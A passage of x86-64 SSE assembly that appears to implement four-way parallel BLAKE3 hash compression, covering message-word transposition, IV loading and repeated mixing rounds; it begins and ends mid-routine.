movdqu xmm8, xmmword ptr [r8+rdx-0x30]
movdqu xmm9, xmmword ptr [r9+rdx-0x30]
movdqu xmm10, xmmword ptr [r10+rdx-0x30]
movdqu xmm11, xmmword ptr [r11+rdx-0x30]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x40], xmm8
movdqa xmmword ptr [rsp+0x50], xmm9
movdqa xmmword ptr [rsp+0x60], xmm12
movdqa xmmword ptr [rsp+0x70], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x20]
movdqu xmm9, xmmword ptr [r9+rdx-0x20]
movdqu xmm10, xmmword ptr [r10+rdx-0x20]
movdqu xmm11, xmmword ptr [r11+rdx-0x20]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x80], xmm8
movdqa xmmword ptr [rsp+0x90], xmm9
movdqa xmmword ptr [rsp+0xA0], xmm12
movdqa xmmword ptr [rsp+0xB0], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x10]
movdqu xmm9, xmmword ptr [r9+rdx-0x10]
movdqu xmm10, xmmword ptr [r10+rdx-0x10]
movdqu xmm11, xmmword ptr [r11+rdx-0x10]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0xC0], xmm8
movdqa xmmword ptr [rsp+0xD0], xmm9
movdqa xmmword ptr [rsp+0xE0], xmm12
movdqa xmmword ptr [rsp+0xF0], xmm13
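// Remaining state rows: xmm9-11 broadcast IV words 1-3, and xmm12-15
// carry the counter low/high, block-length, and flag rows.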
movdqa xmm9, xmmword ptr [BLAKE3_IV_1+rip]
movdqa xmm10, xmmword ptr [BLAKE3_IV_2+rip]
movdqa xmm11, xmmword ptr [BLAKE3_IV_3+rip]
movdqa xmm12, xmmword ptr [rsp+0x110]
movdqa xmm13, xmmword ptr [rsp+0x120]
movdqa xmm14, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
movd xmm15, eax
pshufd xmm15, xmm15, 0x00
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [BLAKE3_IV_0+rip]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x80]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x70]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xB0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x50]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xC0]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xA0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
